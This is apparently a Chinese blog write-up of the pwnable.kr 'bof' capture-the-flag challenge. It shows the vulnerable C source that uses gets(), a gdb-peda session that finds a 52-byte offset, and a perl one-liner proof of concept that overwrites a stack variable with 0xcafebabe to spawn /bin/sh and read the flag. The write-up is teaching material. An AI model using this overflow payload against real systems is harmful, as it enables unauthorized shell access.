Fork me on GitHub

bof(pwnable.kr_bof)缓冲区溢出简单利用

题目传送门:http://pwnable.kr/play.php

下载连接中的源代码和二进制文件后,查看源代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}

判断这个时考察缓冲区溢出的题目,漏洞产生原因时gets()函数对输入的数据长度没有做检查,导致溢出,上gdb分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# gdb -q ./bof

warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory
Reading symbols from ./bof...(no debugging symbols found)...done.
gdb-peda$ pattern_creat 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /root/文档/PWN/pwnable.kr/3.bof/bof
overflow me :
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Nah..
*** stack smashing detected ***: /root/文档/PWN/pwnable.kr/3.bof/bof terminated

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x31414162 ('bAA1')
EBX: 0xf7fcf000 --&gt; 0x1bef0
ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EDX: 0xf7ffd4fc --&gt; 0x0
ESI: 0xffffc9e0 --&gt; 0x0
EDI: 0xffffc9e0 --&gt; 0x0
EBP: 0xffffcab8 --&gt; 0xffffcb18 --&gt; 0xf7fa4000 --&gt; 0x1b2db0
ESP: 0xffffc910 --&gt; 0x40000000 ('')
EIP: 0xf7fc6886 (cmp WORD PTR [eax],0xb858)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7fc687e: xchg ax,ax
0xf7fc6880: mov ecx,DWORD PTR [eax+0x48]
0xf7fc6883: mov eax,DWORD PTR [eax+0x4c]
=&gt; 0xf7fc6886: cmp WORD PTR [eax],0xb858
0xf7fc688b: je 0xf7fc6b28
0xf7fc6891: cmp BYTE PTR [eax],0xb8
0xf7fc6894: jne 0xf7fc68b0
0xf7fc6896: cmp DWORD PTR [eax+0x1],0xad
[------------------------------------stack-------------------------------------]
0000| 0xffffc910 --&gt; 0x40000000 ('')
0004| 0xffffc914 --&gt; 0x0
0008| 0xffffc918 --&gt; 0xffffc960 --&gt; 0x0
0012| 0xffffc91c --&gt; 0xf7fcf000 --&gt; 0x1bef0
0016| 0xffffc920 --&gt; 0x0
0020| 0xffffc924 --&gt; 0x0
0024| 0xffffc928 --&gt; 0x0
0028| 0xffffc92c --&gt; 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1
gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA
AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52

判断溢出的偏移位数为52,而在代码中:

1
2
3
if(key == 0xcafebabe){
system("/bin/sh");
}

需要将key所在的内存数据替换为0xcafebabe,而通过file命令我们可以知道本程序为32位程序,采用小端序,因此我们只需构造"A"*52+""\xbe\xba\xfe\xca"来进行溢出

1
2
root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# file bof
bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped

poc

1
(perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof

即可运行/bin/sh来cat flag:

1
daddy, I just pwned a buFFer :)
您的支持是我最大的动力🍉